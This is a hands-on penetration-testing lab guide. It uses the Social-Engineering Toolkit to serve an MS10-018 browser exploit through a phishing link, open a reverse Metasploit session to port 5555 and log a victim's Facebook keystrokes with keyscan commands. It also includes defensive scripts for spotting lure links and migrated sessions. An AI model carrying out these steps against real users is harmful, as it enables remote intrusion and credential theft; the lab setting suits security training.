
Hands-On Guide - Social Engineering Toolkit (SET): Lesson 2

{ Create Malicious Weblink to Sniff Victim's Keystrokes }

Section 0. Background Information
  • What is the Social-Engineering Toolkit (SET)
    • The Social-Engineering Toolkit (SET) is a Python-driven suite of custom tools that focuses solely on the human element of penetration testing.
    • Its main purpose is to augment and simulate social-engineering attacks so that the tester can effectively assess how a targeted attack might succeed.
    • SET ships with penetration-testing Linux distributions such as BackTrack 5, BackBox, Blackbuntu, GnackTrack, and others.
  • Social Engineering Note
    • Imagine an attacker embedding the malicious link in an email to a possible victim.
    • The victim does not inspect the link before clicking it and so does not notice that it points at a bare IP address instead of a domain name, and that the IP address is listening on a non-standard port.
      • (e.g., http://192.168.1.105:8080)
    • This type of attack is especially dangerous because all the victim sees is a web browser crash; they do not realize that:
      1. A Metasploit payload was injected into their system
      2. A Metasploit session is attached to their system
      3. The attached session was migrated from iexplore.exe to notepad.exe.
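
The two tells in the note above (a bare IP address where a hostname belongs, and a port other than the scheme's default) can be checked mechanically before anyone clicks. The following is an added example, not code from the original lab or from SET; it also flags a user@ prefix in front of the real host, which lets the visible text lie about the destination. SAMPLE_EMAIL and the URLs in it are constructed for illustration (192.168.1.105:8080 is simply the lab's attacker address).

```python
"""Screen links in an e-mail body for social-engineering tells.

Added example, not part of the original lab or of SET.  SAMPLE_EMAIL and
the URLs in it are constructed for illustration."""
import ipaddress
import re
from urllib.parse import urlsplit

# Plain-text URL extraction; trailing prose punctuation is stripped below.
URL_RE = re.compile(r"""https?://[^\s<>"')\]]+""", re.IGNORECASE)
DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed phishing body: one bare-IP lure, one legitimate link, one
# userinfo lure whose visible host name is not where the click goes.
SAMPLE_EMAIL = """Hi,
Your account will be locked. Verify it here: http://192.168.1.105:8080/.
If that fails use https://www.facebook.com/ as usual, or the mirror
http://www.facebook.com@192.168.1.105:8080/login (constructed lure).
"""


def screen_url(url):
    """Return the reasons a URL looks like a lure.  An empty list means none
    of these heuristics fired; it does not mean the link is safe."""
    reasons = []
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)          # IPv4, or IPv6 from a [..] literal
        reasons.append("host is an IP address, not a domain name")
    except ValueError:
        pass                                # a normal hostname
    try:
        port = parts.port                   # None when no explicit port
    except ValueError:
        port = None
        reasons.append("malformed port")
    if port is not None and port != DEFAULT_PORTS.get(parts.scheme):
        reasons.append(f"non-default port {port}")
    if parts.username is not None:
        reasons.append("userinfo before the host hides the real destination")
    return reasons


def extract_urls(text):
    """Pull http(s) URLs out of free text, dropping sentence punctuation."""
    return [m.group(0).rstrip(".,;:!?") for m in URL_RE.finditer(text)]


def screen_email(text):
    """Map each suspicious URL in the body to the reasons it was flagged."""
    return {u: screen_url(u) for u in extract_urls(text) if screen_url(u)}


if __name__ == "__main__":
    for url, why in screen_email(SAMPLE_EMAIL).items():
        print(url, "->", "; ".join(why))
```

An explicit default port (https://example.com:443/) is deliberately not flagged; only a port that differs from the scheme's default is, because that is what the lab's 8080 listener looks like to the recipient.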
Section 1. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Programs --> VMware --> VMware Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 2. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME desktop
    • Instructions:
      1. Type startx

Section 3. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

Section 4. Start the Social Engineering ToolKit
  1. Start Social Engineering ToolKit
    • Instructions:
      1. cd /pentest/exploits/set
      2. ./set
  2. Website Attack Vector
    • Instructions:
      1. Select 2
  3. Select Metasploit Browser Exploit Method
    • Instructions:
      1. Select 2
  4. Select Web Templates
    • Instructions:
      1. Select 1
  5. Set Web Attack
    • Instructions:
      1. Select 3
  6. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
    • Instructions:
      1. Select 15
  7. Windows Shell Reverse_TCP
    • Instructions:
      1. Select 1
    • Note(FYI):
      • The keystroke sniffer, execute, and channel backgrounding used in Sections 8 and 10 are Meterpreter commands. If your version of SET lists "Windows Shell Reverse_TCP" and "Windows Reverse_TCP Meterpreter" as separate payloads, choose the Meterpreter one; a plain command-shell payload cannot run keyscan_start.
  8. Set Reverse Port
    • Instructions:
      1. Set to 5555
  9. Waiting for the server to start
    • Instructions:
      1. Copy the weblink that is listed above the "Server started" line.
      2. Continue to the next section.
    • Notes:
      • This is the malicious weblink the attacker will use to social engineer their way into the victim's machine.

Section 5. Start Up Windows Machine
  • Social Engineering Note
    • Imagine how an attacker could embed the malicious link obtained in Section 4, Step 9 in an email to a possible victim.
    • This type of attack is especially dangerous because all the victim sees is a web browser crash; they do not realize that a Metasploit payload was injected and that a session is now attached to a migrated notepad process.
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button
  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine
  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: Use the Class Password or whatever you set it.
  5. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt
  6. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
      • Record your Damn Vulnerable WXP-SP2's IP Address.
     
Section 6. Start Up a Web Browser
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
  2. Victim Clicks on Link
    • Instructions:
      1. Place the BackTrack IP in the Address Bar.
        • In my case, http://192.168.1.105:8080/
        • In your case, use the weblink you copied in Section 4, Step 9.
    • Note(FYI):
      • The Web Browser will just crash.

Section 7. Analyzing Results After Web Browser Crash
  1. Start up a Command Prompt
    • Instructions:
      1. All Programs --> Accessories --> Command Prompt
  2. Check for the Metasploit connection
    • Instructions:
      1. netstat -nao | findstr 5555
      2. tasklist | findstr 2976
        • 2976 is the process ID for the Metasploit session running on port 5555.
        • In your case, the process ID will probably be different.
      3. tasklist | findstr notepad
    • Proof of Lab Instructions: (this step can be skipped)
      1. date
      2. echo "Your Name"
        1. Where the string "Your Name" is your actual name.
        2. e.g., echo "Nguyen Tuong Minh"
      3. Do a PrtScn
      4. Paste into a word document
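
The three commands in Step 2 above correlate a connection on port 5555 to a PID and then to an image name by hand. The following is an added example, not code from the original lab or from Metasploit, that does the same correlation over captured `netstat -nao` and `tasklist` output and generalizes it: any established connection to a watched port is reported, and so is any image that should never own a socket (notepad.exe after migration being the lab's case). The two sample outputs are constructed in the Windows XP column layout; PID 2976 and port 5555 are the values from the lab text.

```python
"""Correlate `netstat -nao` with `tasklist` to find a reverse connection
and the process that owns it.

Added example, not part of the original lab or of Metasploit.  The sample
outputs below are constructed in the Windows XP column layout."""
import re

# Images that have no legitimate reason to hold a network connection.
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}

NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       940
  TCP    192.168.1.116:139      0.0.0.0:0              LISTENING       4
  TCP    192.168.1.116:1052     192.168.1.105:5555     ESTABLISHED     2976
  UDP    0.0.0.0:445            *:*                                    4
"""

TASKLIST_SAMPLE = """
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
explorer.exe                1488 Console                 0     14,212 K
iexplore.exe                2340 Console                 0     22,104 K
notepad.exe                 2976 Console                 0      3,420 K
"""

# image name (may contain spaces), PID, session name, session#, memory
TASKLIST_RE = re.compile(r"^(?P<image>.+?)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")


def parse_netstat(text):
    """Return one dict per TCP/UDP row; UDP rows have no State column."""
    conns = []
    for line in text.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP":
            proto, local, foreign, state, pid = f
        elif len(f) == 4 and f[0] == "UDP":
            proto, local, foreign, pid = f
            state = ""
        else:
            continue                     # banner, header and blank lines
        conns.append({"proto": proto, "local": local, "foreign": foreign,
                      "state": state, "pid": int(pid)})
    return conns


def parse_tasklist(text):
    """Map PID -> image name from tasklist's default table output."""
    procs = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
        if m:
            procs[int(m.group("pid"))] = m.group("image").strip()
    return procs


def find_suspicious(netstat_text, tasklist_text, watch_ports=frozenset({5555})):
    """Established TCP connections worth a second look, with the reasons."""
    procs = parse_tasklist(tasklist_text)
    findings = []
    for c in parse_netstat(netstat_text):
        if c["proto"] != "TCP" or c["state"] != "ESTABLISHED":
            continue
        image = procs.get(c["pid"], "<not in tasklist>")
        remote_port = int(c["foreign"].rsplit(":", 1)[1])
        reasons = []
        if remote_port in watch_ports:
            reasons.append(f"remote port {remote_port} is on the watch list")
        if image.lower() in NO_NETWORK_IMAGES:
            reasons.append(f"{image} should not own a socket (migrated session?)")
        if reasons:
            findings.append({**c, "image": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in find_suspicious(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"PID {hit['pid']} {hit['image']} {hit['local']} -> {hit['foreign']}: "
              + "; ".join(hit["reasons"]))
```

The image-name check is the one that survives an attacker changing the port: the connection in the sample is still reported with an empty watch list, purely because notepad.exe owns it.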

Section 8. Entering the Victim's Machine
  1. Get a MSF Prompt
    • Instructions:
      1. Press <Enter>, when you see the notepad.exe line.
  2. Obtain the Victim's Command Prompt
    • Instructions:
      1. sessions
      2. sessions -i 1
      3. execute -f cmd.exe -i -M
  3. Start the keystroke sniffer
    • Instructions:
      1. Press the <Ctrl> and "z" key at the same time.
        • This backgrounds the interactive cmd.exe channel and returns you to the meterpreter prompt; confirm when asked.
      2. y
      3. keyscan_start
      4. Continue to next Section.

Section 9. Login to Facebook
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
     
  2. Login into Facebook
    • Instructions:
      1. Email: Use a fake address
        • first.last@victim.com, where first is your first name and last is your last name.
        • e.g., john.gray@victim.com
      2. Password: Use whatever you want.

Section 10. Review sniffed keystrokes
  1. Dump the sniffed keystrokes
    • Instructions:
      1. keyscan_dump
        • This prints the keystrokes captured since keyscan_start, including the Facebook email address and password typed in Section 9.
      2. keyscan_stop
    • Proof of Lab Instructions #2:
      1. Do a PrtScn
      2. Paste into same word document that contains proof of lab #1.
